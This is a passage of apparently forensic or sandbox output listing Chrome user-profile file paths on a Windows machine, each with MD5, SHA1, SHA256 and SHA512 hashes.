| SHA1 | 7fb6355e07865bd9a7b3450669bcdfbb06791dee |
| SHA256 | f1734be6e93a161b829fd1fb2265810e948f4c22a4a12bf21960ff92b639fe44 |
| SHA512 | 23f9f99f3d56f22f4d162da8a7843b7575c2646a347ca9ac207f44879bcadb5870a79511626561068020fcdcdaa08305fcd2f0028a81785bd747ad004fddc085 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4b51732e9ba723289445f228add535ce |
| SHA1 | ff1a54ee2b587a6501355183131e7f0577eea25d |
| SHA256 | 8b6fb1b0f1214a6640518acff029913da1a64aaeb4a075e10786f3fc052c6eb5 |
| SHA512 | 5657ddd79b031e9ca4f1de08888fffa867e97cc45202e1f0cf73c67dad4ac1e9a2b06c2702fde2c5dbf176eed94a9788f6dc5315af215308fab8eef3022bcdb5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 34d5dffd3b44f46e1d3a34cc8f14fa1a |
| SHA1 | 99f604f67f17fa0c4cfe2cbc01ec201272e8aa1c |
| SHA256 | 0830e074758abecdaee7d6bca02a29cecf9ca3fb742199bc0daded77f1b92c65 |
| SHA512 | b1061988454346f884146337f64672a2cd0f303e8de0c324bf2da51c90defcec187f561d691aaf501702bdfa68d9eb1c29449ecb1c89f8d05fa40625bcc0a533 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | ae1bccd6831ebfe5ad03b482ee266e4f |
| SHA1 | 01f4179f48f1af383b275d7ee338dd160b6f558a |
| SHA256 | 1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649 |
| SHA512 | baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5a9b66.TMP
| MD5 | 2c47aea4b71623f7b0af4815a988241d |
| SHA1 | 1d05244b1ad125a58dd2596227ddece2d3891fdb |
| SHA256 | 84d55ff1af748d85909d25f0f7d2a986e0310ad10da26d0e53c98c22d072644c |
| SHA512 | f71334d5e0a63ee4472979291ec05d8d4987527b1ae69a4bb590d3dd2b550b7d9dc25c981f158d4d63be4934e3b187b1fb30fb91fbc84ccc4313d341358dae3a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 61e739fc6df6dd2d8803140546c51901 |
| SHA1 | 1680e5355112bfea03cfce714f5db2e278525ad4 |
| SHA256 | 76ca425e9937f8f5c7494e67b8d697ad2b44c8ad538282da04f2fcb82dc28f97 |
| SHA512 | 3a3dc3496117812d5627b0c7b0d218d48a3fddbde9bdb8ef1dd32a56bd43ff07e6b70224d9c608d358e4a8f84c09f548205c7df3ba08fe990b4036bfe504a8d4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c9518e5abd2974b1b23d55ae7d0075fe |
| SHA1 | 01f610bcbfb4fb48f21d908927d8c4936ca3f780 |
| SHA256 | 34ab64f0ff435be6a98d8d040e5b9c8ad71051d88f48357b6f6de7df089b5038 |
| SHA512 | b2469bc6696872f4800aadb5ff9ee2826e75db5610abaaa28fd87d348f28db68b1cd1bb10fe343683c3e18426b00c8fea84068ce7bcc21958853406cd3b66193 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b20132586c8c09ca9da997290ab8200d |
| SHA1 | 06acb22b04cc706d7cb650efb1cec16530651028 |
| SHA256 | 84683c5281d3b68baf14fc1f1aa7b4c339cb26421f934afa8158ca7780c59832 |
| SHA512 | 41efac37eeefc19d6e9d138fd13018183041a0fbdf2bce6fc3bfb6d70297463ae1f927cb432eb57b6acc6fd5cf6fe22436f9c958f01e291f5b6180227d1b174d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 8fc6ad1741c82e275975fd65cf475b75 |
| SHA1 | 776cbda55b646e628ff38fc291f78868e0848e57 |
| SHA256 | 8c1719cee028b7c6f9e4d1b858cedc7b0f18371c85a85d3cdcca74e579b43030 |
| SHA512 | e0221ec4ff3c3bfaf8699ce630d46e8a69d161464455659810787409fd06de46beb5f24ea85b0ebaa30c5e617d05efb40e83f26969bb0a1ff82ea8f0c7723d16 |